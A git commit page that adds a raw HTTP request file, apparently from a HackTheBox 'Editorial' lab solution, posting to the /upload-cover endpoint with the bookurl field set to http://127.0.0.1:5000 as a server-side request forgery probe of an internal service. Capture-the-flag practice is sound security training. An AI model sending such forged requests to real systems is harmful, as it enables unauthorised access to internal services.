diff options
author | compromyse <compromyse@compromyse.local> | 2024-10-09 18:32:58 +0530 |
---|---|---|
committer | compromyse <compromyse@compromyse.local> | 2024-10-09 18:32:58 +0530 |
commit | ba4c50473c05f4ab14d31771facebe0bab9c10da (patch) | |
tree | f229b20f2965b797bb90cacc90450327f3959695 /editorial/request.txt | |
parent | 5d65139dc29600df46d7de85b35324ee3fc6a827 (diff) |
Diffstat (limited to 'editorial/request.txt')
-rw-r--r-- | editorial/request.txt | 22 |
1 files changed, 22 insertions, 0 deletions
diff --git a/editorial/request.txt b/editorial/request.txt new file mode 100644 index 0000000..9e4f88f --- /dev/null +++ b/editorial/request.txt @@ -0,0 +1,22 @@ +POST /upload-cover HTTP/1.1
+Host: editorial.htb
+Content-Length: 305
+Accept-Language: en-US
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4sG5ro4zgTRwZZA2
+Accept: */*
+Origin: http://editorial.htb
+Referer: http://editorial.htb/upload
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+
+------WebKitFormBoundary4sG5ro4zgTRwZZA2
+Content-Disposition: form-data; name="bookurl"
+
+http://127.0.0.1:5000
+------WebKitFormBoundary4sG5ro4zgTRwZZA2
+Content-Disposition: form-data; name="bookfile"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary4sG5ro4zgTRwZZA2--
|